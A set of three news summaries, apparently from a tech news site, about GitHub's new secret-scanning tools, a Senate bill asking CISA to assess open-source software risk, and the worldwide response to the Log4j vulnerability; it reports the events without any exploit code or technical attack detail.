Cloud-based code hosting service GitHub wants to make open-source material more secure. The Microsoft service is expanding safety features with two new offerings in beta. Secret scanning alerts are now free for all public repositories while push-notifications for custom secret patterns are also being made available. Open-source code is now incorporated into a whopping 97 percent of applications, according to Synopsys, which says 90 percent of organizations rely on it to varying degrees. Yet the very access that contributes to its popularity also leaves it vulnerable to malicious actors, as emphasized by the SolarWinds, Log4j and other breaches. Continue reading GitHub Is Testing New Security Tools for Open-Source Code

Senate Homeland Security Committee leaders Gary Peters (D-Michigan) and Rob Portman (R-Ohio) have introduced a bill requiring a risk framework for open-source code. The proposed legislation would require the Cybersecurity and Infrastructure Security Agency to develop the risk evaluation process for open-source software being used by federal agencies and critical infrastructure. The move follows the discovery in December of a vulnerability in the Apache Software Foundation’s popular Log4j Java logging utility. Peters said the Log4j incident presented a serious threat to banks, hospitals, and utility companies, among other national security operations. Continue reading Senate Group Wants CISA to Protect Open-Source Software

The Log4j code vulnerability has the media declaring the Internet in a state of crisis. Log4j is a Java-based logging framework developers use to track user activity within applications on the popular Apache web server. Security experts are rushing to patch the bug, which is being exploited to remotely assume control of vulnerable systems, stealing credentials, installing malware and launching other attacks that permeate consumer devices. Last week, the U.S. Cybersecurity and Infrastructure Security Agency issued a Log4j alert, as did Australia’s CERT emergency response team. Continue reading Major Security Vulnerability Triggers Worldwide Internet Crisis